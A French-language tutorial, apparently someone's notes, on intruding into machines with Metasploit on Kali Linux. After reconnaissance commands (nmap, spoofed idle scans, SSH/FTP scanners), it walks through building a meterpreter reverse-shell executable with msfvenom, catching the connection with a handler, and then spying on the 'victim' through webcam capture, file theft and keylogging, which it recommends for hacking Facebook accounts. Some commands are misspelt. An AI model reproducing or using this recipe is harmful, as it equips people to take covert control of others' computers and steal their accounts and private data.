INTRUSIONS METASPLOIT AVEC KALI
METHODE METASPLOIT
sudo service postgresql start (lancer postgres pour une bonne progréssion de metasploit→ psql- V pour connaître sa version)
sudo msfconsole (démarrer metasploit)
msfvenom -l encoders (liste des encoders → encodages des shellcodes)
show exploits (liste des exploits → codes connection machine)
show payloads (liste des payloads ->codes d’intrusion machine)
whois domaine.com (récolte d’informations sur un domaine,
apt-get install whois pour installer)
nslookup domaine.com (ip du domaine)
nmap -h (variante de nmap)
nmap -Pn ip (scan des ports)
nmap -O -A (détection du système)
use auxiliary/scanner/ip/ipidseq (spoofer une ip avec idlescan)
show options
set RHOSTS 192.168.2.0-192.168.2.29
run
continuer avec l’ip choisi sinon nmap -sI -A ip_spoofé ip_cible
use auxiliary/scanner/ssh/ssh_version (pour protocole ssh)
show options
set RHOSTS 192.168.2.0
run
use auxiliary/scanner/ftp/ftp_version(pour protocole ftp)
show options
set RHOSTS 192.168.2.0
run
Pirater Windows avec Metasploit
Ouvrez Terminal et entrez msfvenom. Cela vous montrera le principe de création d’un virus.
Msfconsole ne chargera que les exploits, mais msfvenom chargera les exploits avec les encodages.
Entrer :
root@kali:~# msfvenom –p windows/meterpreter_reverse_tcp –f exe –a x86 –platform windows
LHOST 192.168.174.192 LPORT 4444 –o santy.exe
Demo:
-p prépare le payload(charge utile).
-f exe indique que le type de fichier, ou l’extension de fichier sera exe
-a x86 indique l’architecture système. x86 est utilisée dans les systèmes 32 bits, même si mon système est en 64 bits,
on peut faire tourner un programme 32 bits sur un système 64 bits.
–platform windows indique que ce virus est pour Windows.
-LHOST and LPORT sont déjà expliqués plus haut. Pour connaître votre LHOST, tapez ipconfig.
Notez qu’il faut toujours utiliser l’adresse IP de l’interface en fonctionnement.
-o est le chemin d’enregistrement du fichier, avec son nom.
Comme je veux l’enregistrer dans le dossier root, je ne précise que son nom.
La prochaine commande à entrer :
root@kali:~# use mulit/handler
Vous devez maintenant installer Payload.
root@kali:~# Set PAYLOAD windows/meterpreter/reverse_tcp
Payload devrait être le même que celui que vous avez utilisé pour créer le malware.
Votre LHOST est votre adresse IP, vous savez comment l’entrer. Si vous ne connaissez pas votre adresse IP,
ouvrez un nouvel onglet en appuyant sur maj+ctrl+T et entrez ipconfig, cela affichera votre adresse IP locale.
Dans mon cas, c’est 192.168.174.129 votre IP devrait être dans un format similaire, mais pas identique.
root@kali:~# Set LHOST 192.168.174.129
root@kali:~# Set LPORT 4444
Dernière commande:
Tapez exploit ou run. Les deux fonctionnent de la même manière.
Retour de commande :
meterpreter >
ce qui représente un accès au système cible
Vous pouvez prendre des photos depuis la webcam, ou enregistrer des vidéos live.
Enregistrer les frappes du clavier (keylogger)
Télécharger ou Uploader des fichiers sur la machine victime.
Eteindre ou redémarrer l’ordinateur.
Meterpreter > help
descriptif des commandes possibles
exemple :
Pour prendre une photo via la webcam, entrez :
root@kali:~# webcam_snap → accès à la webcam
root@kali:~# pwd → accès aux dossiers
Pour enregistrer les frappes clavier, entrez “start keyscan_start” puis après quelques temps, entrez “keyscan_stop”,
pour voir ce qui a été tapé, “keyscan_demp”. Les Keyloggers sont un excellent moyen de pirater un compte Facebook.